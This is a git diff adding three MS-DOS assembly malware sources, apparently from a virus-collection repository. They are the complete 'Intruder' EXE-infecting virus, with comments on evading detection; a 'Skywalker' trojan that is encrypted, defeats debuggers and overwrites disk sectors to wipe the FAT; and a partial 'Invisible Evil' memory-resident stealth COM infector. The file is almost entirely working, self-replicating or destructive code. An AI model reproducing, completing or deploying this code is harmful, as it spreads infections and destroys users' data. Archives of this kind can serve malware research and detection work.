@@ -0,0 +1,710 @@ +;The Intruder Virus is an EXE file infector which can jump from directory to +;directory and disk to disk. It attaches itself to the end of a file and +;modifies the EXE file header so that it gets control first, before the host +;program. When it is done doing its job, it passes control to the host program, +;so that the host executes without a hint that the virus is there. + + + .SEQ ;segments must appear in sequential order + ;to simulate conditions in actual active virus + + +;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together + +;HOSTSEG program code segment. The virus gains control before this routine and +;attaches itself to another EXE file. As such, the host program for this +;installer simply tries to delete itself off of disk and terminates. That is +;worthwhile if you want to infect a system with the virus without getting +;caught. Just execute the program that infects, and it disappears without a +;trace. You might want to name the program something more innocuous, though. + +HOSTSEG SEGMENT BYTE + ASSUME CS:HOSTSEG,SS:HSTACK + +PGMSTR DB 'INTRUDER.EXE',0 + +HOST: + mov ax,cs ;we want DS=CS here + mov ds,ax + mov dx,OFFSET PGMSTR + mov ah,41H + int 21H ;delete this exe file + mov ah,4CH + mov al,0 + int 21H ;terminate normally +HOSTSEG ENDS + + +;Host program stack segment + +HSTACK SEGMENT PARA STACK + db 100H dup (?) ;100 bytes long +HSTACK ENDS + +;------------------------------------------------------------------------ +;This is the virus itself + +STACKSIZE EQU 100H ;size of stack for the virus +NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table + +;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together + +;Intruder Virus code segment. This gains control first, before the host. As this +;ASM file is layed out, this program will look exactly like a simple program +;that was infected by the virus. 
+ +VSEG SEGMENT PARA + ASSUME CS:VSEG,DS:VSEG,SS:VSTACK + +;data storage area comes before any code +VIRUSID DW 0C8AAH ;identifies virus +OLDDTA DD 0 ;old DTA segment and offset +DTA1 DB 2BH dup (?) ;new disk transfer area +DTA2 DB 56H dup (?) ;dta for directory finds (2 deep) +EXE_HDR DB 1CH dup (?) ;buffer for EXE file header +EXEFILE DB '\*.EXE',0 ;search string for an exe file +ALLFILE DB '\*.*',0 ;search string for any file +USEFILE DB 78 dup (?) ;area to put valid file path +LEVEL DB 0 ;depth to search directories for a file +HANDLE DW 0 ;file handle +FATTR DB 0 ;old file attribute storage area +FTIME DW 0 ;old file time stamp storage area +FDATE DW 0 ;old file date stamp storage area +FSIZE DD 0 ;file size storage area +VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there +VCODE DB 1 ;identifies this version + +;-------------------------------------------------------------------------- +;Intruder virus main routine starts here +VIRUS: + push ax ;save startup info in ax + mov ax,cs + mov ds,ax ;set up DS=CS for the virus + mov ax,es ;get PSP Seg + mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it + call SHOULDRUN ;run only when certain conditions met signalled by z set + jnz REL1 ;conditions aren't met, go execute host program + call SETSR ;modify SHOULDRUN procedure to activate conditions + call NEW_DTA ;set up a new DTA location + call FIND_FILE ;get an exe file to attack + jnz FINISH ;returned nz - no valid file, exit + call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode + call INFECT ;move program code to file we found to attack + call REST_ATTRIBUTE ;restore the original file attributes and close the file +FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup + pop ax ;restore startup value of ax +REL1: ;relocatable marker for host stack segment + mov bx,HSTACK ;set up host program stack segment (ax=segment) + cli 
;interrupts off while changing stack + mov ss,bx +REL1A: ;marker for host stack pointer + mov sp,OFFSET HSTACK + mov es,WORD PTR [OLDDTA+2] ;set up ES correctly + mov ds,WORD PTR [OLDDTA+2] ;and DS + sti ;interrupts back on +REL2: ;relocatable marker for host code segment + jmp FAR PTR HOST ;begin execution of host program + +;-------------------------------------------------------------------------- +;First Level - Find a file which passes FILE_OK +; +;This routine does a complex directory search to find an EXE file in the +;current directory, one of its subdirectories, or the root directory or one +;of its subdirectories, to find a file for which FILE_OK returns with C reset. +;If you want to change the depth of the search, make sure to allocate enough +;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work, +;since the recursive FINDBR uses a different DTA area for the search (see DOS +;functions 4EH and 4FH) on each level. +; +FIND_FILE: + mov al,'\' ;set up current directory path in USEFILE + mov BYTE PTR [USEFILE],al + mov si,OFFSET USEFILE+1 + xor dl,dl + mov ah,47H + int 21H ;get current dir, USEFILE= \dir + cmp BYTE PTR [USEFILE+1],0 ;see if it is null. If so, its the root + jnz FF2 ;not the root + xor al,al ;make correction for root directory, + mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' +FF2: mov al,2 + mov [LEVEL],al ;search 2 subdirs deep + call FINDBR ;attempt to locate a valid file + jz FF3 ;found one - exit + xor al,al ;nope - try the root directory + mov BYTE PTR [USEFILE],al ;by setting USEFILE= '' + inc al ;al=1 + mov [LEVEL],al ;search one subdir deep + call FINDBR ;attempt to find file +FF3: + ret ;exit with z flag set by FINDBR to indicate success/failure + + +;-------------------------------------------------------------------------- +;Second Level - Find in a branch +; +;This function searches the directory specified in USEFILE for EXE files. 
+;after searching the specified directory, it searches subdirectories to the +;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this +;routine exits with Z set and leaves the file and path in USEFILE +; +FINDBR: + call FINDEXE ;search current dir for EXE first + jnc FBE3 ;found it - exit + cmp [LEVEL],0 ;no - do we want to go another directory deeper? + jz FBE1 ;no - exit + dec [LEVEL] ;yes - decrement LEVEL and continue + mov di,OFFSET USEFILE ;'\curr_dir' is here + mov si,OFFSET ALLFILE ;'\*.*' is here + call CONCAT ;get '\curr_dir\*.*' in USEFILE + inc di + push di ;store pointer to first * + call FIRSTDIR ;get first subdirectory + jnz FBE ;couldn't find it, so quit +FB1: ;otherwise, check it out + pop di ;strip \*.* off of USEFILE + xor al,al + stosb + mov di,OFFSET USEFILE + mov bx,OFFSET DTA2+1EH + mov al,[LEVEL] + mov dl,2BH ;compute correct DTA location for subdir name + mul dl ;which depends on the depth we're at in the search + add bx,ax ;bx points to directory name + mov si,bx + call CONCAT ;'\curr_dir\sub_dir' put in USEFILE + push di ;save position of first letter in sub_dir name + call FINDBR ;scan the subdirectory and its subdirectories (recursive) + jz FBE2 ;if successful, exit + call NEXTDIR ;get next subdirectory in this directory + jz FB1 ;go check it if search successful +FBE: ;else exit, NZ set, cleaned up + inc [LEVEL] ;increment the level counter before exit + pop di ;strip any path or file spec off of original + xor al,al ;directory path + stosb +FBE1: mov al,1 ;return with NZ set + or al,al + ret + +FBE2: pop di ;successful exit, pull this off the stack +FBE3: xor al,al ;and set Z + ret ;exit + +;-------------------------------------------------------------------------- +;Third Level - Part A - Find an EXE file +; +;This function searches the path in USEFILE for an EXE file which passes +;the test FILE_OK. 
This routine will return the full path of the EXE file +;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return +;with the c flag set. It will search a whole directory before giving up. +; +FINDEXE: + mov dx,OFFSET DTA1 ;set new DTA for EXE search + mov ah,1AH + int 21H + mov di,OFFSET USEFILE + mov si,OFFSET EXEFILE + call CONCAT ;set up USEFILE with '\dir\*.EXE' + push di ;save position of '\' before '*.EXE' + mov dx,OFFSET USEFILE + mov cx,3FH ;search first for any file + mov ah,4EH + int 21H +NEXTEXE: + or al,al ;is DOS return OK? + jnz FEC ;no - quit with C set + pop di + inc di + stosb ;truncate '\dir\*.EXE' to '\dir\' + mov di,OFFSET USEFILE + mov si,OFFSET DTA1+1EH + call CONCAT ;setup file name '\dir\filename.exe' + dec di + push di + call FILE_OK ;yes - is this a good file to use? + jnc FENC ;yes - valid file found - exit with c reset + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTEXE ;and go test it for validity + +FEC: ;no valid file found, return with C set + pop di + mov BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir + stc + ret +FENC: ;valid file found, return with NC + pop di + ret + + +;-------------------------------------------------------------------------- +;Third Level - Part B - Find a subdirectory +; +;This function searches the file path in USEFILE for subdirectories, excluding +;the subdirectory header entries. If one is found, it returns with Z set, and +;if not, it returns with NZ set. +;There are two entry points here, FIRSTDIR, which does the search first, and +;NEXTDIR, which does the search next. +; +FIRSTDIR: + call GET_DTA ;get proper DTA address in dx (calculated from LEVEL) + push dx ;save it + mov ah,1AH ;set DTA + int 21H + mov dx,OFFSET USEFILE + mov cx,10H ;search for a directory + mov ah,4EH ;do search first function + int 21H +NEXTD1: + pop bx ;get pointer to search table (DTA) + or al,al ;successful search? 
+ jnz NEXTD3 ;no, quit with NZ set + test BYTE PTR [bx+15H],10H ;is this a directory? + jz NEXTDIR ;no, find another + cmp BYTE PTR [bx+1EH],'.' ;is it a subdirectory header? + jne NEXTD2 ;no - valid directory, exit, setting Z flag + ;else it was dir header entry, so fall through to next +NEXTDIR: ;second entry point for search next + call GET_DTA ;get proper DTA address again - may not be set up + push dx + mov ah,1AH ;set DTA + int 21H + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTD1 ;and loop to check the validity of the return + +NEXTD2: + xor al,al ;successful exit, set Z flag +NEXTD3: + ret ;exit routine + +;-------------------------------------------------------------------------- +;Return the DTA address associated to LEVEL in dx. This is simply given by +;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record +;in its own DTA, since a search at a lower level occurs in the middle of the +;higher level search, and we don't want the higher level being ruined by +;corrupted data. +; +GET_DTA: + mov dx,OFFSET DTA2 + mov al,2BH + mul [LEVEL] + add dx,ax ;return with dx= proper dta offset + ret + +;-------------------------------------------------------------------------- +;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz +;string at ES:DI. Return ES:DI pointing to the end of the first string in the +;destination (or the first character of the second string, after moved). +; +CONCAT: + mov al,byte ptr es:[di] ;find the end of string 1 + inc di + or al,al + jnz CONCAT + dec di ;di points to the null at the end + push di ;save it to return to the caller +CONCAT2: + cld + lodsb ;move second string to end of first + stosb + or al,al + jnz CONCAT2 + pop di ;and restore di to point to end of string 1 + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the EXE file specified in USEFILE is useable. 
+;if so return nc, else return c +;What makes an EXE file useable?: +; a) The signature field in the EXE header must be 'MZ'. (These +; are the first two bytes in the file.) +; b) The Overlay Number field in the EXE header must be zero. +; c) There must be room in the relocatable table for NUMRELS +; more relocatables without enlarging it. +; d) The word VIRUSID must not appear in the 2 bytes just before +; the initial CS:0000 of the test file. If it does, the virus +; is probably already in that file, so we skip it. +; +FILE_OK: + call GET_EXE_HEADER ;read the EXE header in USEFILE into EXE_HDR + jc OK_END ;error in reading the file, so quit + call CHECK_SIG_OVERLAY ;is the overlay number zero? + jc OK_END ;no - exit with c set + call REL_ROOM ;is there room in the relocatable table? + jc OK_END ;no - exit + call IS_ID_THERE ;is id at CS:0000? +OK_END: ret ;return with c flag set properly + +;-------------------------------------------------------------------------- +;Returns c if signature in the EXE header is anything but 'MZ' or the overlay +;number is anything but zero. +CHECK_SIG_OVERLAY: + mov al,'M' ;check the signature first + mov ah,'Z' + cmp ax,WORD PTR [EXE_HDR] + jz CSO_1 ;jump if OK + stc ;else set carry and exit + ret +CSO_1: xor ax,ax + sub ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0 + ret ;c is set if it's anything but 0 + +;-------------------------------------------------------------------------- +;This function reads the 28 byte EXE file header for the file named in USEFILE. +;It puts the header in EXE_HDR, and returns c set if unsuccessful. 
+;
+GET_EXE_HEADER:
+ mov dx,OFFSET USEFILE
+ mov ax,3D02H ;r/w access open file
+ int 21H
+ jc RE_RET ;error opening - C set - quit without closing
+ mov [HANDLE],ax ;else save file handle
+ mov bx,ax ;handle to bx
+ mov cx,1CH ;read 28 byte EXE file header
+ mov dx,OFFSET EXE_HDR ;into this buffer
+ mov ah,3FH
+ int 21H
+RE_RET: ret ;return with c set properly
+
+;--------------------------------------------------------------------------
+;This function determines if there are at least NUMRELS openings in the
+;current relocatable table in USEFILE. If there are, it returns with
+;carry reset, otherwise it returns with carry set. The computation
+;this routine does is to compare whether
+; ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table
+;is >= than 4 * NUMRELS. If it is, then there is enough room
+;
+REL_ROOM:
+ mov ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs
+ add ax,ax
+ add ax,ax
+ sub ax,WORD PTR [EXE_HDR+6] ;number of relocatables
+ add ax,ax
+ add ax,ax
+ sub ax,WORD PTR [EXE_HDR+24] ;start of relocatable table
+ cmp ax,4*NUMRELS ;enough room to put relocatables in?
+RR_RET: ret ;exit with carry set properly
+
+
+;--------------------------------------------------------------------------
+;This function determines whether the word at the initial CS:0000 in USEFILE
+;is the same as VIRUSID in this program. If it is, it returns c set, otherwise
+;it returns c reset.
+;
+IS_ID_THERE:
+ mov ax,WORD PTR [EXE_HDR+22] ;Initial CS
+ add ax,WORD PTR [EXE_HDR+8] ;Header size
+ mov dx,16
+ mul dx
+ mov cx,dx
+ mov dx,ax ;cxdx = position to look for VIRUSID in file
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer, relative to beginning
+ int 21H
+ mov ah,3FH
+ mov bx,[HANDLE]
+ mov dx,OFFSET VIDC
+ mov cx,2 ;read 2 bytes into VIDC
+ int 21H
+ jc II_RET ;couldn't read - bad file - report as though ID is there so we dont do any more to this file
+ mov ax,[VIDC]
+ cmp ax,[VIRUSID] ;is it the VIRUSID?
+ clc
+ jnz II_RET ;if not, then virus is not already in this file
+ stc ;else it is probably there already
+II_RET: ret
+
+
+;--------------------------------------------------------------------------
+;This routine makes sure file end is at paragraph boundary, so the virus
+;can be attached with a valid CS. Assumes file pointer is at end of file.
+SETBDY:
+ mov al,BYTE PTR [FSIZE]
+ and al,0FH ;see if we have a paragraph boundary (header is always even # of paragraphs)
+ jz SB_E ;all set - exit
+ mov cx,10H ;no - write any old bytes to even it up
+ sub cl,al ;number of bytes to write in cx
+ mov dx,OFFSET FINAL ;set buffer up to point to end of the code (just garbage there)
+ add WORD PTR [FSIZE],cx ;update FSIZE
+ adc WORD PTR [FSIZE+2],0
+ mov bx,[HANDLE]
+ mov ah,40H ;DOS write function
+ int 21H
+SB_E: ret
+
+;--------------------------------------------------------------------------
+;This routine moves the virus (this program) to the end of the EXE file
+;Basically, it just copies everything here to there, and then goes and
+;adjusts the EXE file header and two relocatables in the program, so that
+;it will work in the new environment. It also makes sure the virus starts
+;on a paragraph boundary, and adds how many bytes are necessary to do that.
+;
+INFECT:
+ mov cx,WORD PTR [FSIZE+2]
+ mov dx,WORD PTR [FSIZE]
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer, relative to beginning
+ int 21H ;go to end of file
+ call SETBDY ;lengthen to a paragraph boundary if necessary
+ mov cx,OFFSET FINAL ;last byte of code
+ xor dx,dx ;first byte of code, DS:DX
+ mov bx,[HANDLE] ;move virus code to end of file being attacked with
+ mov ah,40H ;DOS write function
+ int 21H
+ mov dx,WORD PTR [FSIZE] ;find 1st relocatable in code (SS)
+ mov cx,WORD PTR [FSIZE+2]
+ mov bx,OFFSET REL1 ;it is at FSIZE+REL1+1 in the file
+ inc bx
+ add dx,bx
+ mov bx,0
+ adc cx,bx ;cx:dx is that number
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer to 1st relocatable
+ int 21H
+ mov dx,OFFSET EXE_HDR+14 ;get correct old SS for new program
+ mov bx,[HANDLE] ;from the EXE header
+ mov cx,2
+ mov ah,40H ;and write it to relocatable REL1+1
+ int 21H
+ mov dx,WORD PTR [FSIZE]
+ mov cx,WORD PTR [FSIZE+2]
+ mov bx,OFFSET REL1A ;put in correct old SP from EXE header
+ inc bx ;at FSIZE+REL1A+1
+ add dx,bx
+ mov bx,0
+ adc cx,bx ;cx:dx points to FSIZE+REL1A+1
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer to place to write SP to
+ int 21H
+ mov dx,OFFSET EXE_HDR+16 ;get correct old SP for infected program
+ mov bx,[HANDLE] ;from EXE header
+ mov cx,2
+ mov ah,40H ;and write it where it belongs
+ int 21H
+ mov dx,WORD PTR [FSIZE]
+ mov cx,WORD PTR [FSIZE+2]
+ mov bx,OFFSET REL2 ;put in correct old CS:IP in program
+ add bx,1 ;at FSIZE+REL2+1 on disk
+ add dx,bx
+ mov bx,0
+ adc cx,bx ;cx:dx points to FSIZE+REL2+1
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer relavtive to start of file
+ int 21H
+ mov dx,OFFSET EXE_HDR+20 ;get correct old CS:IP from EXE header
+ mov bx,[HANDLE]
+ mov cx,4
+ mov ah,40H ;and write 4 bytes to FSIZE+REL2+1
+ int 21H
+ ;done writing relocatable vectors
+ ;so now adjust the EXE header values
+ xor cx,cx
+ xor dx,dx
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer to start of file
+ int 21H
+ mov ax,WORD PTR [FSIZE] ;calculate new initial CS (the virus' CS)
+ mov cl,4 ;given by (FSIZE/16)-HEADER SIZE (in paragraphs)
+ shr ax,cl
+ mov bx,WORD PTR [FSIZE+2]
+ and bl,0FH
+ mov cl,4
+ shl bl,cl
+ add ah,bl
+ sub ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs)
+ mov WORD PTR [EXE_HDR+22],ax;and save as initial CS
+ mov bx,OFFSET FINAL ;compute new initial SS
+ add bx,10H ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16)
+ mov cl,4
+ shr bx,cl
+ add ax,bx
+ mov WORD PTR [EXE_HDR+14],ax ;and save it
+ mov ax,OFFSET VIRUS ;get initial IP
+ mov WORD PTR [EXE_HDR+20],ax ;and save it
+ mov ax,STACKSIZE ;get initial SP
+ mov WORD PTR [EXE_HDR+16],ax ;and save it
+ mov dx,WORD PTR [FSIZE+2]
+ mov ax,WORD PTR [FSIZE] ;calculate new file size
+ mov bx,OFFSET FINAL
+ add ax,bx
+ xor bx,bx
+ adc dx,bx ;put it in ax:dx
+ add ax,200H ;and set up the new page count
+ adc dx,bx ;page ct= (ax:dx+512)/512
+ push ax
+ mov cl,9
+ shr ax,cl
+ mov cl,7
+ shl dx,cl
+ add ax,dx
+ mov WORD PTR [EXE_HDR+4],ax ;and save it here
+ pop ax
+ and ax,1FFH ;now calculate last page size
+ mov WORD PTR [EXE_HDR+2],ax ;and put it here
+ mov ax,NUMRELS ;adjust relocatables counter
+ add WORD PTR [EXE_HDR+6],ax
+ mov cx,1CH ;and save data at start of file
+ mov dx,OFFSET EXE_HDR
+ mov bx,[HANDLE]
+ mov ah,40H ;DOS write function
+ int 21H
+ mov ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table
+ dec ax ;in order to calculate location of
+ dec ax ;where to add relocatables
+ mov bx,4 ;Location= (No in table-2)*4+Table Offset
+ mul bx
+ add ax,WORD PTR [EXE_HDR+24];table offset
+ mov bx,0
+ adc dx,bx ;dx:ax=end of old table in file
+ mov cx,dx
+ mov dx,ax
+ mov bx,[HANDLE]
+ mov ax,4200H ;set file pointer to table end
+ int 21H
+ mov ax,WORD PTR [EXE_HDR+22] ;and set up 2 pointers: init CS = seg of REL1
+ mov bx,OFFSET REL1
+ inc bx ;offset of REL1
+ mov WORD PTR [EXE_HDR],bx ;use EXE_HDR as a buffer to
+ mov WORD PTR [EXE_HDR+2],ax ;save relocatables in for now
+ mov ax,WORD PTR [EXE_HDR+22] ;init CS = seg of REL2
+ mov bx,OFFSET REL2
+ add bx,3 ;offset of REL2
+ mov WORD PTR [EXE_HDR+4],bx ;write it to buffer
+ mov WORD PTR [EXE_HDR+6],ax
+ mov cx,8 ;and then write 8 bytes of data in file
+ mov dx,OFFSET EXE_HDR
+ mov bx,[HANDLE]
+ mov ah,40H ;DOS write function
+ int 21H
+ ret ;that's it, infection is complete!
+
+;--------------------------------------------------------------------------
+;This routine determines whether the reproduction code should be executed.
+;If it returns Z, the reproduction code is executed, otherwise it is not.
+;Currently, it only executes if the system time variable is a multiple of
+;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1
+;executions of the program. TIMECT should be 2^n-1
+;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program
+;is run. This makes SHOULDRUN return Z for sure the first time, so it
+;definitely runs when this loader program is run, but after that, the time must
+;be an even multiple of TIMECT+1.
+;
+TIMECT EQU 0 ;Determines how often to reproduce (1/64 here)
+;
+SHOULDRUN:
+ xor ah,ah ;zero ax to start, set z flag
+SR1: ret ;this gets replaced by NOP when program runs
+ int 1AH
+ and dl,TIMECT ;is it an even multiple of TIMECT+1 ticks?
+ ret ;return with z flag set if it is, else nz set
+
+
+;--------------------------------------------------------------------------
+;SETSR modifies SHOULDRUN so that the full procedure gets run
+;it is redundant after the initial load
+SETSR:
+ mov al,90H ;NOP code
+ mov BYTE PTR SR1,al ;put it in place of RET above
+ ret ;and return
+
+;--------------------------------------------------------------------------
+;This routine sets up the new DTA location at DTA1, and saves the location of
+;the initial DTA in the variable OLDDTA.
+NEW_DTA:
+ mov ah,2FH ;get current DTA in ES:BX
+ int 21H
+ mov WORD PTR [OLDDTA],bx ;save it here
+ mov ax,es
+ mov WORD PTR [OLDDTA+2],ax
+ mov ax,cs
+ mov es,ax ;set up ES
+ mov dx,OFFSET DTA1 ;set new DTA offset
+ mov ah,1AH
+ int 21H ;and tell DOS where we want it
+ ret
+
+;--------------------------------------------------------------------------
+;This routine reverses the action of NEW_DTA and restores the DTA to its
+;original value.
+RESTORE_DTA:
+ mov dx,WORD PTR [OLDDTA] ;get original DTA seg:ofs
+ mov ax,WORD PTR [OLDDTA+2]
+ mov ds,ax
+ mov ah,1AH
+ int 21H ;and tell DOS where to put it
+ mov ax,cs ;restore ds before exiting
+ mov ds,ax
+ ret
+
+;--------------------------------------------------------------------------
+;This routine saves the original file attribute in FATTR, the file date and
+;time in FDATE and FTIME, and the file size in FSIZE. It also sets the
+;file attribute to read/write, and leaves the file opened in read/write
+;mode (since it has to open the file to get the date and size), with the handle
+;it was opened under in HANDLE. The file path and name is in USEFILE.
+SAVE_ATTRIBUTE:
+ mov ah,43H ;get file attr
+ mov al,0
+ mov dx,OFFSET USEFILE
+ int 21H
+ mov [FATTR],cl ;save it here
+ mov ah,43H ;now set file attr to r/w
+ mov al,1
+ mov dx,OFFSET USEFILE
+ mov cl,0
+ int 21H
+ mov dx,OFFSET USEFILE
+ mov al,2 ;now that we know it's r/w
+ mov ah,3DH ;we can r/w access open file
+ int 21H
+ mov [HANDLE],ax ;save file handle here
+ mov ah,57H ;and get the file date and time
+ xor al,al
+ mov bx,[HANDLE]
+ int 21H
+ mov [FTIME],cx ;and save it here
+ mov [FDATE],dx ;and here
+ mov ax,WORD PTR [DTA1+28] ;file size was set up here by
+ mov WORD PTR [FSIZE+2],ax ;search routine
+ mov ax,WORD PTR [DTA1+26] ;so move it to FSIZE
+ mov WORD PTR [FSIZE],ax
+ ret
+
+;--------------------------------------------------------------------------
+;Restore file attribute, and date and time of the file as they were before
+;it was infected. This also closes the file
+REST_ATTRIBUTE:
+ mov dx,[FDATE] ;get old date and time
+ mov cx,[FTIME]
+ mov ah,57H ;set file date and time to old value
+ mov al,1
+ mov bx,[HANDLE]
+ int 21H
+ mov ah,3EH
+ mov bx,[HANDLE] ;close file
+ int 21H
+ mov cl,[FATTR]
+ xor ch,ch
+ mov ah,43H ;Set file attr to old value
+ mov al,1
+ mov dx,OFFSET USEFILE
+ int 21H
+ ret
+
+FINAL: ;last byte of code to be kept in virus
+
+VSEG ENDS
+
+
+;--------------------------------------------------------------------------
+;Virus stack segment
+
+VSTACK SEGMENT PARA STACK
+ db STACKSIZE dup (?)
+VSTACK ENDS
+
+ END VIRUS ;Entry point is the virus
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.intrview.asm b/MSDOS/Virus.MSDOS.Unknown.intrview.asm
new file mode 100644
index 00000000..a12edd20
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.intrview.asm
@@ -0,0 +1,82 @@
+; INTRVIEW.ASM -- Skywalker Trojan
+; Created with Nowhere Man's Virus Creation Laboratory v1.00
+; Written by Serpico
+
+virus_type equ 3 ; Trojan Horse
+is_encrypted equ 1 ; We're encrypted
+tsr_virus equ 0 ; We're not TSR
+
+code segment byte public
+ assume cs:code,ds:code,es:code,ss:code
+ org 0100h
+
+start label near
+
+main proc near
+ call encrypt_decrypt ; Decrypt the virus
+
+start_of_code label near
+
+stop_tracing: mov cx,09EBh
+ mov ax,0FE05h ; Acutal move, plus a HaLT
+ jmp $-2
+ add ah,03Bh ; AH now equals 025h
+ jmp $-10 ; Execute the HaLT
+ mov bx,offset null_vector ; BX points to new routine
+ push cs ; Transfer CS into ES
+ pop es ; using a PUSH/POP
+ int 021h
+ mov al,1 ; Disable interrupt 1, too
+ int 021h
+ jmp short skip_null ; Hop over the loop
+null_vector: jmp $ ; An infinite loop
+skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
+lock_keys: mov al,128 ; Change here screws DEBUG
+ out 021h,al ; If tracing then lock keyboard
+
+ mov si,offset data00 ; SI points to data
+ mov ah,0Eh ; BIOS display char. function
+display_loop: lodsb ; Load the next char. into AL
+ or al,al ; Is the character a null?
+ je disp_strnend ; If it is, exit
+ int 010h ; BIOS video interrupt
+ jmp short display_loop ; Do the next character
+disp_strnend:
+
+ mov ax,0002h ; First argument is 2
+ mov cx,0010h ; Second argument is 16
+ cli ; Disable interrupts (no Ctrl-C)
+ cwd ; Clear DX (start with sector 0)
+ int 026h ; DOS absolute write interrupt
+ sti ; Restore interrupts
+
+
+ mov ax,04C00h ; DOS terminate function
+ int 021h
+main endp
+
+data00 db "C'mon now, trim that FAT! 1 and 2 and 3 and....",13,10,10,0
+
+vcl_marker db "[VCL]",0 ; VCL creation marker
+
+
+note db "Please wait, interview is load"
+ db "ing. You've been infected with"
+ db "the Skywalker Trojan. HaHaHa"
+ db "YoDa - AlLiAnCe"
+
+end_of_code label near
+
+encrypt_decrypt proc near
+ mov si,offset start_of_code ; SI points to code to decrypt
+ mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
+xor_loop: xor word ptr [si],06734h ; XOR a word by the key
+ inc si ; Do the next word
+ inc si ;
+ loop xor_loop ; Loop until we're through
+ ret ; Return to caller
+encrypt_decrypt endp
+finish label near
+
+code ends
+ end main
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.inv-evil.asm b/MSDOS/Virus.MSDOS.Unknown.inv-evil.asm
new file mode 100644
index 00000000..3bea902d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.inv-evil.asm
@@ -0,0 +1,331 @@
+; Virusname : Invisible Evil
+; Virusauthor: Metal Militia
+; Virusgroup : Immortal Riot
+; Origin : Sweden
+;
+; It's a memory resident, stealth, infector of com files.
+; It check for two nops a bit after the jmp to see if it's already
+; infected or not, and to stealth it, it'll check the seconds.
+; No destructive routine included in this version, perhaps to come(?)
+; Um!.. well, enjoy Insane Reality issue #4!
+; I think that's all for now, outa here..
+;
+;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+; INVISIBLE EVIL!
+;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+virus segment
+ assume cs:virus,ds:virus,es:nothing
+
+ org 100h
+start: db 0E9h,02,00,90h,90h ; Jmp to vstart
+
+vstart equ $
+ call code_start ; call codie_startie
+code_start:
+ pop si
+ sub si,offset code_start ; so we can use the lea command etc
+ jmp code_continue
+
+ db ' Our past is ' ; Lil' poem (?)
+ db ' our future! ' ; of mine
+
+code_continue:
+ mov bp,si ; Now, put bp in si instead so bp's used
+ jmp load ; Jmp and go resident
+
+old_21 dd ? ; Old int21 interrupt saved here
+
+new_21: ; Our own, new one int21
+ cmp ax,4b00h ; Is a file being executed
+ je exec1 ; If so, damn it! INFECT!
+
+dir_thang:
+ cmp ah,11h ; Find first
+ je hide_size ; Use stealth
+ cmp ah,12h ; Find next
+ je hide_size ; Use stealth
+ cmp ax,3030h ; Another copy trying to go resident?
+ jne do_old ; If not, do the old int21 thang
+ mov bx,3030h ; Show that we're already resident
+do_old: jmp dword ptr cs:[(old_21-vstart)] ; Jmp old int21
+exec1: jmp exec ; Try to infect
+do_dir: jmp dword ptr cs:[(old_21-vstart)] ; See do_old
+ ret ; But return back
+
+hide_size:
+ pushf
+ push cs
+ call do_dir ; get FCB (current)
+ cmp al,00h ; Is DIR being used (?)
+ jz undocumented_get_FCB ; If so, go on
+ jmp dir_error ; If not, get the fuck
+ ; outa this place man
+undocumented_get_FCB:
+ push ax ; push
+ push bx ; push
+ push es ; push (gaak! no pops)
+ mov ah,51h ; get FCB (location)
+ int 21h ; figure it out
+ mov es,bx ; get FCB (info)
+ cmp bx,es:[16h] ; check it
+ je fix_it_up ; if so, move on
+ jmp not_inf
+
+fix_it_up:
+ mov bx,dx ; fixup
+ mov al,[bx] ; some
+ push ax ; shit
+ mov ah,2fh ; get the DTA
+ int 21h ; yeah, you do that
+ pop ax ; atlast, pop me babe
+ inc al ; check FCB (extended)
+ jz add_it ; ok, move on
+ jmp normal_fcb ; jmp normal_fcb
+
+add_it:
+ add bx,7h ; yes, add it.. go ahead
+normal_fcb:
+ mov ax,es:[bx+17h]
+ and ax,1fh
+ xor al,01h ; are the file's seconds
+ jz go_on_and_do_it_strong ; equal to "2"?
+ jmp not_inf ; If so, outa here
+
+go_on_and_do_it_strong:
+ and byte ptr es:[bx+17h],0e0h ; subtract the size
+ sub es:[bx+1dh],(vend-vstart) ; how much? (*.*)
+ sbb es:[bx+1fh],ax ; yet another stealthed
+not_inf:pop es ; we will..
+ pop bx ; we will..
+ pop ax ; pop you! pop you!
+
+dir_error:
+ iret ; return to the one who
+ ; called this thang
+exec:
+ push ax ; push the stuff needed
+ push bx ; (as normally)
